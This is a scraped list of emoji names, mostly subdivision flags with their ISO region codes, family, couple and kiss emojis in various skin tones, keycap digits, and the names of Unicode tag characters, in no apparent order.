🏴 Flag for Madeira (PT-30)
🏴 Flag for San Vicente (SV-SV)
🏴 Flag for Alborz (IR-32)
🏴 Flag for Fa’asaleleaga (WS-FA)
👨🏼👨🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Newfoundland and Labrador (CA-NL)
🏴 Flag for Peloponnese (GR-J)
🏴 Flag for Sint Maarten (NL-SX)
🏴 Flag for St. Julian’s (MT-48)
🏴 Flag for Adamawa (NG-AD)
👩🏿👩🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for São Tomé (ST-S)
👩🏻👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Auce (LV-010)
🏴 Flag for Cordillera Administrative (PH-15)
🏴 Flag for Fukui (JP-18)
👨🏿👩🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Kakheti (GE-KA)
🏴 Flag for Jeju (KR-49)
🏴 Flag for Souss-Massa-Drâa (MA-13)
🏴 Flag for Inčukalns (LV-037)
🏴 Flag for French Southern Territories (FR-TF)
🏴 Flag for Quintana Roo (MX-ROO)
👩🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👨🏾👨🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Győr-Moson-Sopron (HU-GS)
👩🏿👩🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
Shibuya
👩❤️👨🏽 Couple With Heart - Woman, Man: Medium Skin Tone
🏴 Flag for Gaga’ifomauga (WS-GI)
🏴 Flag for Nord-Est (HT-NE)
🏴 Flag for Central Singapore (SG-01)
🏴 Flag for Tungurahua (EC-T)
# Number Sign
👨🏻👨🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
1 Digit One
🏴 Flag for Tarija (BO-T)
👨🏾👩🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Cibitoke (BI-CI)
🏴 Flag for Upper South Province (MV-US)
🏴 Flag for Canillo (AD-02)
🏴 Flag for Bamyan (AF-BAM)
🏴 Flag for Encamp (AD-03)
🏴 Flag for Northern Mariana Islands (US-MP)
🏴 Flag for Babīte (LV-012)
🏴 Flag for Cotopaxi (EC-X)
🏴 Flag for Ngounié (GA-4)
* Asterisk
Tag Latin Small Letter Z
🏴 Flag for La Massana (AD-04)
Tag Digit Three
👩🏼❤️💋👩🏻 Kiss - Woman: Medium-Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Berane (ME-03)
👨🏿❤️💋👨🏽 Kiss - Man: Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for El Valle (DO-37)
👩🏾❤️👩🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Baringo (KE-01)
🏴 Flag for Amanat Al Asimah (YE-SA)
👨🏼👨🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
Tag Digit Two
🏴 Flag for Senglea (MT-20)
🕴️♀️ Woman in Business Suit Levitating
🏴 Flag for Haut-Mbomou (CF-HM)
Tag Digit One
Tag Digit Four
🏴 Flag for Absheron (AZ-ABS)
6 Digit Six
🏴 Flag for Savannakhet (LA-SV)
🏴 Flag for Kayes (ML-1)
🏴 Flag for Abu Dhabi (AE-AZ)
🏴 Flag for Asturias (ES-AS)
🏴 Flag for Kirkuk (IQ-KI)
👩❤️👩🏽 Couple With Heart - Woman, Woman: Medium Skin Tone
🏴 Flag for Berlin (DE-BE)
8 Digit Eight
🏴 Flag for Escaldes-Engordany (AD-08)
🏴 Flag for Ningxia (CN-64)
🏴 Flag for Cañar (EC-F)
🏴 Flag for Ajman (AE-AJ)
🕴🏻♀️ Woman in Business Suit Levitating: Light Skin Tone
👨🏻❤️💋👩 Kiss - Man: Light Skin Tone, Woman
Tag Digit Eight
🏴 Flag for Fars (IR-14)
🏴 Flag for Fujairah (AE-FU)
👨🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Virovitica-Podravina (HR-10)
Tag Latin Small Letter I
7 Digit Seven
Tag Digit Seven
Tag Latin Small Letter E
👩🏼👩🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Ratak Chain (MH-T)
🏴 Flag for Sharjah (AE-SH)
Tag Latin Small Letter F
🏴 Flag for Vilniaus Municipality (LT-57)
🏴 Flag for Westfjords (IS-4)
🏴 Flag for British Columbia (CA-BC)
4 Digit Four
🏴 Flag for Balkh (AF-BAL)
👨👶👦 Family: Man, Baby, Boy
🏴 Flag for Hsinchu County (TW-HSQ)
👩👶👧 Family: Woman, Baby, Girl
🏴 Flag for Jalisco (MX-JAL)
🏴 Flag for Kitui (KE-18)
🏴 Flag for Azores (PT-20)
🏴 Flag for Manipur (IN-MN)
🏴 Flag for Badakhshan (AF-BDS)
👩🏻❤️👩🏼 Couple With Heart - Woman: Light Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Ordino (AD-05)
👩🏽❤️💋👩 Kiss - Woman: Medium Skin Tone, Woman
🏴 Flag for Baghlan (AF-BGL)
🏴 Flag for Cross River (NG-CR)
🏴 Flag for Colorado (US-CO)
Tag Latin Small Letter T
🏴 Flag for Radoviš (MK-64)
🏴 Flag for Wellington (NZ-WGN)
👨🏽👨🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Kurdistan (IR-16)
👨🏽❤️💋👨🏿 Kiss - Man: Medium Skin Tone, Man: Dark Skin Tone
Tag Latin Small Letter S
👩👶👶 Family: Woman, Baby, Baby
🏴 Flag for Daykundi (AF-DAY)
👨🏻❤️💋👨🏾 Kiss - Man: Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Farah (AF-FRA)
Tag Latin Small Letter Q
🏴 Flag for Guatemala (GT-GU)
🏴 Flag for Thurgau (CH-TG)
🏴 Flag for Chechen (RU-CE)
Tag Digit Five
🏴 Flag for Ghōr (AF-GHO)
🏴 Flag for Vienna (AT-9)
🏴 Flag for Ghazni (AF-GHA)
Tag Latin Small Letter U
🏴 Flag for Gaborone (BW-GA)
Tag Latin Small Letter Y
Cancel Tag
Tag Latin Small Letter W
👩🏽❤️👩🏿 Couple With Heart - Woman: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Amazonas (CO-AMA)
Tag Latin Small Letter N
👩❤️💋👩🏽 Kiss - Woman, Woman: Medium Skin Tone
👨👶 Family: Man, Baby
🏴 Flag for Burgenland (AT-1)
🏴 Flag for Helmand (AF-HEL)
Tag Digit Six
🏴 Flag for Jowzjan (AF-JOW)
🧕♀️ Woman With Headscarf
Tag Latin Small Letter B
Tag Digit Zero
🏴 Flag for Herat (AF-HER)
🏴 Flag for Saint Mark (GD-05)
3 Digit Three
Tag Latin Small Letter G
🕴🏾♀️ Woman in Business Suit Levitating: Medium-Dark Skin Tone
👩🏽❤️💋👨🏽 Kiss - Woman: Medium Skin Tone, Man: Medium Skin Tone
🏴 Flag for Alaska (US-AK)
Tag Latin Small Letter R
🏴 Flag for Lautém (TL-LA)
🏴 Flag for Kabul (AF-KAB)
👨❤️💋👨🏿 Kiss - Man, Man: Dark Skin Tone
🧕♂️ Man With Headscarf
Tag Latin Small Letter V
Tag Latin Small Letter D
🏴 Flag for Kandahar (AF-KAN)
🏴 Flag for Kapisa (AF-KAP)
🏴 Flag for Saint Roman (MC-SR)
🏴 Flag for Hiiu (EE-39)
Tag Latin Small Letter M
🏴 Flag for Khost (AF-KHO)
🧕🏻♂️ Man With Headscarf: Light Skin Tone
🏴 Flag for Kunduz (AF-KDZ)
👩🏿❤️👨 Couple With Heart - Woman: Dark Skin Tone, Man
🏴 Flag for South Dakota (US-SD)
🏴 Flag for Badghis (AF-BDG)
🏴 Flag for Southern (IS-8)
🏴 Flag for Kunar (AF-KNR)
👨👨👶👶 Family: Man, Man, Baby, Baby
🏴 Flag for Tokyo (JP-13)
🏴 Flag for Laghman (AF-LAG)
🧕🏽♂️ Man With Headscarf: Medium Skin Tone
🏴 Flag for Logar (AF-LOG)
5 Digit Five
Tag Latin Small Letter C
🏴 Flag for Faryab (AF-FYB)
Tag Latin Small Letter P
🏴 Flag for Nangarhar (AF-NAN)
Tag Digit Nine
🏴 Flag for Navarra Chartered Community (ES-NC)
👩🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Nayarit (MX-NAY)
🏴 Flag for Pernambuco (BR-PE)
🏴 Flag for Campania (IT-72)
🧕🏾♂️ Man With Headscarf: Medium-Dark Skin Tone
👩🏽❤️💋👩🏾 Kiss - Woman: Medium Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Nuristan (AF-NUR)
👨👨👧👶 Family: Man, Man, Girl, Baby
🏴 Flag for West New Britain (PG-WBK)
👨🏼👩🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Upper Demerara-Berbice (GY-UD)
👨❤️💋👩 Kiss - Man, Woman
🏴 Flag for Afar (ET-AF)
🏴 Flag for Parwan (AF-PAR)
🏴 Flag for Nimruz (AF-NIM)
🏴 Flag for Karlovac (HR-04)
🏴 Flag for Paktia (AF-PIA)
🧕🏿♂️ Man With Headscarf: Dark Skin Tone
🧕🏼♂️ Man With Headscarf: Medium-Light Skin Tone
🏴 Flag for Baja California (MX-BCN)
🏴 Flag for Paktika (AF-PKA)
🏴 Flag for Phoenix Islands (KI-P)
Tag Latin Small Letter O
🏴 Flag for Panjshir (AF-PAN)
🏴 Flag for Ticino (CH-TI)
🏴 Flag for Žirovnica (SI-192)
🏴 Flag for Halland (SE-N)
Tag Latin Small Letter J
👩🏽❤️💋👩🏻 Kiss - Woman: Medium Skin Tone, Woman: Light Skin Tone
👨🏾👨🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Northern Bahr el Ghazal (SS-BN)
👨🏽❤️💋👩 Kiss - Man: Medium Skin Tone, Woman
🏴 Flag for Basse-Kotto (CF-BK)
👨❤️👨🏻 Couple With Heart - Man, Man: Light Skin Tone
👨🏽❤️👨 Couple With Heart - Man: Medium Skin Tone, Man
🏴 Flag for Butnan (LY-BU)
👩👶 Family: Woman, Baby
🏴 Flag for Sabaragamuwa (LK-9)
🏴 Flag for Samangan (AF-SAM)
🏴 Flag for Nukulaelae (TV-NKL)
🏴 Flag for Ras al-Khaimah (AE-RK)
🏴 Flag for Ceuta (ES-CE)
🏴 Flag for Dubai (AE-DU)
👨🏻👨🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Okinawa (JP-47)
🏴 Flag for Sar-e Pol (AF-SAR)
👩🏼👩🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
Tag Latin Small Letter L
🏴 Flag for Urozgan (AF-URU)
9 Digit Nine
👩🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨❤️💋👨🏽 Kiss - Man, Man: Medium Skin Tone
🏴 Flag for Saint Joseph (DM-06)
🏴 Flag for Saint John (AG-04)
🏴 Flag for Vichada (CO-VID)
🏴 Flag for Ngarchelong (PW-218)
🏴 Flag for Arkhangelsk (RU-ARK)
🏴 Flag for Zabul (AF-ZAB)
🏴 Flag for Saint George (AG-03)
🏴 Flag for Lombardy (IT-25)
👨🏻❤️💋👨🏻 Kiss - Man: Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Pardubický kraj (CZ-53)
🏴 Flag for Saint Paul (AG-06)
🏴 Flag for Trà Vinh (VN-51)
👩👨👶👧 Family: Woman, Man, Baby, Girl
🏴 Flag for South Gyeongsang (KR-48)
🏴 Flag for Saint Mary (AG-05)
🏴 Flag for North Aegean (GR-K)
👩👩👶👧 Family: Woman, Woman, Baby, Girl
🏴 Flag for Zamora-Chinchipe (EC-Z)
🏴 Flag for Masaya (NI-MS)
🏴 Flag for Gilbert Islands (KI-G)
🏴 Flag for Chihuahua (MX-CHH)
👨🏼👨🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👨🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩👨👶👶 Family: Woman, Man, Baby, Baby
🏴 Flag for Redonda (AG-11)
👩👩👶 Family: Woman, Woman, Baby
👨❤️💋👩🏻 Kiss - Man, Woman: Light Skin Tone
👨❤️💋👨🏾 Kiss - Man, Man: Medium-Dark Skin Tone
🏴 Flag for Berat County (AL-01)
Tag Latin Small Letter A
🏴 Flag for Barbuda (AG-10)
🏴 Flag for San Andrés & Providencia (CO-SAP)
🏴 Flag for Elbasan County (AL-03)
👨🏾👨🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👨🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Karnataka (IN-KA)
🏴 Flag for Gjirokastër County (AL-05)
🏴 Flag for Hokkaidō (JP-01)
👩🏾👨🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Central (UG-C)
👨🏼❤️💋👨 Kiss - Man: Medium-Light Skin Tone, Man
🏴 Flag for Durrës County (AL-02)
🏴 Flag for Fier County (AL-04)
🏴 Flag for Korçë County (AL-06)
🏴 Flag for Alto Paraguay (PY-16)
🏴 Flag for Kukës County (AL-07)
👨🏿❤️💋👨 Kiss - Man: Dark Skin Tone, Man
🏴 Flag for Upper Takutu-Upper Essequibo (GY-UT)
👨🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻👨🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Dibër County (AL-09)
🏴 Flag for Lezhë County (AL-08)
👨🏼👨🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Tirana County (AL-11)
🏴 Flag for Sant Julià de Lòria (AD-06)
🏴 Flag for Bahia (BR-BA)
🏴 Flag for Shkodër County (AL-10)
👩❤️💋👨🏿 Kiss - Woman, Man: Dark Skin Tone
👨🏽👨🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩❤️💋👨🏽 Kiss - Woman, Man: Medium Skin Tone
🏴 Flag for Vlorë County (AL-12)
🏴 Flag for Trat (TH-23)
🏴 Flag for Gegharkunik (AM-GR)
👨🏿👨🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Aragatsotn (AM-AG)
🏴 Flag for Ararat (AM-AR)
🏴 Flag for Yerevan (AM-ER)
🏴 Flag for Kotayk (AM-KT)
🏴 Flag for Corse (FR-COR)
🏴 Flag for Armavir (AM-AV)
👩❤️💋👩🏿 Kiss - Woman, Woman: Dark Skin Tone
🏴 Flag for Minas Gerais (BR-MG)
🏴 Flag for Pointe-Noire (CG-16)
🏴 Flag for Lori (AM-LO)
🏴 Flag for Skikda (DZ-21)
🏴 Flag for Shirak (AM-SH)
👩❤️💋👩🏾 Kiss - Woman, Woman: Medium-Dark Skin Tone
🏴 Flag for Andorra la Vella (AD-07)
🏴 Flag for Altai Krai (RU-ALT)
🏴 Flag for Lovrenc na Pohorju (SI-167)
👩❤️💋👩🏼 Kiss - Woman, Woman: Medium-Light Skin Tone
👨🏿❤️💋👩🏻 Kiss - Man: Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Panevėžys County (LT-PN)
🏴 Flag for Cibao Norte (DO-35)
🏴 Flag for Vest-Agder (NO-10)
👨❤️💋👩🏿 Kiss - Man, Woman: Dark Skin Tone
🏴 Flag for Vayots Dzor (AM-VD)
👩🏻❤️💋👩🏻 Kiss - Woman: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Vermont (US-VT)
👨🏽❤️💋👨 Kiss - Man: Medium Skin Tone, Man
🏴 Flag for Bengo (AO-BGO)
👩🏻❤️💋👩 Kiss - Woman: Light Skin Tone, Woman
🏴 Flag for Meta (CO-MET)
🏴 Flag for Saba (NL-BQ2)
👩🏽❤️💋👩🏼 Kiss - Woman: Medium Skin Tone, Woman: Medium-Light Skin Tone
👨🏽👩🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Benguela (AO-BGU)
🏴 Flag for Sucre (CO-SUC)
🏴 Flag for Cuando Cubango (AO-CCU)
🏴 Flag for Madre de Dios (PE-MDD)
🏴 Flag for Vaud (CH-VD)
🏴 Flag for Bié (AO-BIE)
🏴 Flag for Cabinda (AO-CAB)
🏴 Flag for Huíla (AO-HUI)
🏴 Flag for Cuanza Sul (AO-CUS)
👨❤️💋👩🏽 Kiss - Man, Woman: Medium Skin Tone
👩👩👦👶 Family: Woman, Woman, Boy, Baby
🏴 Flag for Huambo (AO-HUA)
👨🏼❤️👩🏾 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Kyrenia (CY-06)
👩🏼❤️💋👨🏻 Kiss - Woman: Medium-Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Umm al-Quwain (AE-UQ)
🏴 Flag for Lunda Sul (AO-LSU)
🏴 Flag for Grand Cape Mount (LR-CM)
🏴 Flag for Lunda Norte (AO-LNO)
👩🏽❤️👨🏿 Couple With Heart - Woman: Medium Skin Tone, Man: Dark Skin Tone
👨🏾❤️👩🏾 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Cuanza Norte (AO-CNO)
🏴 Flag for Malanje (AO-MAL)
👩🏼❤️💋👩 Kiss - Woman: Medium-Light Skin Tone, Woman
👨🏼👩🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Moxico (AO-MOX)
🏴 Flag for Namibe (AO-NAM)
👨🏾👩🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
Tag Latin Small Letter K
🕴🏼♀️ Woman in Business Suit Levitating: Medium-Light Skin Tone
🏴 Flag for Salta (AR-A)
👨🏾👩🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Lualaba (CD-LU)
🏴 Flag for Buenos Aires Province (AR-B)
👨🏿👩🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for San Luis (AR-D)
🏴 Flag for Zaire (AO-ZAI)
🏴 Flag for Afyonkarahisar (TR-03)
0 Digit Zero
🏴 Flag for Quảng Trị (VN-25)
🕴🏿♀️ Woman in Business Suit Levitating: Dark Skin Tone
🏴 Flag for Uíge (AO-UIG)
👩🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Zhytomyrshchyna (UA-18)
👨🏾❤️💋👨🏽 Kiss - Man: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Cesar (CO-CES)
🏴 Flag for Syunik (AM-SU)
🏴 Flag for Entre Ríos (AR-E)
👨🏿❤️💋👩 Kiss - Man: Dark Skin Tone, Woman
🏴 Flag for La Rioja (AR-F)
🏴 Flag for East Kazakhstan (KZ-VOS)
🏴 Flag for Maidan Wardak (AF-WAR)
🏴 Flag for San Juan (AR-J)
👩🏾👩🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Luanda (AO-LUA)
🏴 Flag for La Pampa (AR-L)
👩🏼❤️💋👩🏽 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium Skin Tone
👨🏼👩🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏼👩🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Catamarca (AR-K)
🏴 Flag for Río Negro (AR-R)
🏴 Flag for Chaco (AR-H)
🏴 Flag for Formosa (AR-P)
🏴 Flag for Mendoza (AR-M)
🏴 Flag for Misiones (AR-N)
🏴 Flag for Neuquén (AR-Q)
👨🏽👩🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Tucumán (AR-T)
🏴 Flag for Santa Fe (AR-S)
🏴 Flag for Corrientes (AR-W)
🏴 Flag for Jujuy (AR-Y)
🏴 Flag for Tierra del Fuego (AR-V)
🏴 Flag for Chubut (AR-U)
🏴 Flag for Córdoba (AR-X)
🏴 Flag for Santa Cruz (AR-Z)
🏴 Flag for Santiago del Estero (AR-G)
🏴 Flag for Carinthia (AT-2)
🏴 Flag for Basel-Landschaft (CH-BL)
👩🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻👩🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨👨👦👧 Family: Man, Man, Boy, Girl
🏴 Flag for Lower Austria (AT-3)
👩👶👦 Family: Woman, Baby, Boy
🏴 Flag for Nouakchott Ouest (MR-13)
👨🏼👩🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Mbomou (CF-MB)
🏴 Flag for Styria (AT-6)
🏴 Flag for Ilocos (PH-01)
🏴 Flag for Tyrol (AT-7)
🏴 Flag for Guizhou (CN-52)
🏴 Flag for Xaisomboun (LA-XS)
🏴 Flag for Vorarlberg (AT-8)
👨🏼👨🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Salzburg (AT-5)
👨🏿👩🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩👩👶👶 Family: Woman, Woman, Baby, Baby
👩👨👧👦 Family: Woman, Man, Girl, Boy
👩👨👧 Family: Woman, Man, Girl
👩👦👶 Family: Woman, Boy, Baby
🏴 Flag for New South Wales (AU-NSW)
👩👨👧👶 Family: Woman, Man, Girl, Baby
👩🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Northern Territory (AU-NT)
👩🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Queensland (AU-QLD)
2 Digit Two
👩👨👧👧 Family: Woman, Man, Girl, Girl
👩🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Upper Austria (AT-4)
🏴 Flag for East Macedonia and Thrace (GR-A)
👨🏽👩🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👩🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨👶👧 Family: Man, Baby, Girl
👨🏻👩🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone
👨🏿👩🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👩👨👶 Family: Woman, Man, Baby
🏴 Flag for Nebraska (US-NE)
🏴 Flag for Agstafa (AZ-AGA)
🏴 Flag for Takhar (AF-TAK)
🏴 Flag for Western Australia (AU-WA)
🏴 Flag for Aghjabadi (AZ-AGC)
🏴 Flag for Astara (AZ-AST)
🏴 Flag for Balakan (AZ-BAL)
👩❤️💋👨🏼 Kiss - Woman, Man: Medium-Light Skin Tone
🏴 Flag for California (US-CA)
🏴 Flag for Agdash (AZ-AGS)
🏴 Flag for Baku (AZ-BA)
👨🏻❤️💋👩🏿 Kiss - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Victoria (AU-VIC)
🏴 Flag for Agdam (AZ-AGM)
👨🏻👧🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barda (AZ-BAR)
👨🏽👩🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Agsu (AZ-AGU)
🏴 Flag for Tanganyika (CD-TA)
👩🏻❤️👨🏼 Couple With Heart - Woman: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Bilasuvar (AZ-BIL)
🏴 Flag for Jalilabad (AZ-CAL)
🏴 Flag for Jabrayil (AZ-CAB)
🏴 Flag for Beylagan (AZ-BEY)
🏴 Flag for Novo Mesto (SI-085)
🏴 Flag for Niari (CG-9)
🏴 Flag for Dashkasan (AZ-DAS)
🏴 Flag for Fizuli (AZ-FUZ)
👩🏿❤️💋👨🏽 Kiss - Woman: Dark Skin Tone, Man: Medium Skin Tone
👨🏿❤️👨🏾 Couple With Heart - Man: Dark Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Goychay (AZ-GOY)
🏴 Flag for Goranboy (AZ-GOR)
🏴 Flag for Ganja (AZ-GA)
🏴 Flag for Umm Salal (QA-US)
🏴 Flag for Eastern (FJ-E)
🏴 Flag for Goygol (AZ-GYG)
🏴 Flag for Hajigabul (AZ-HAC)
👩🏿❤️💋👩 Kiss - Woman: Dark Skin Tone, Woman
🏴 Flag for Rēzekne Municipality (LV-077)
🏴 Flag for Australian Capital Territory (AU-ACT)
👨🏽❤️💋👩🏾 Kiss - Man: Medium Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Federal Capital Territory (NG-FC)
🏴 Flag for Bryansk (RU-BRY)
🏴 Flag for Tavush (AM-TV)
🏴 Flag for Santo Domingo de los Tsáchilas (EC-SD)
👩🏼❤️👩 Couple With Heart - Woman: Medium-Light Skin Tone, Woman
🏴 Flag for Imishli (AZ-IMI)
🏴 Flag for Aşgabat (TM-S)
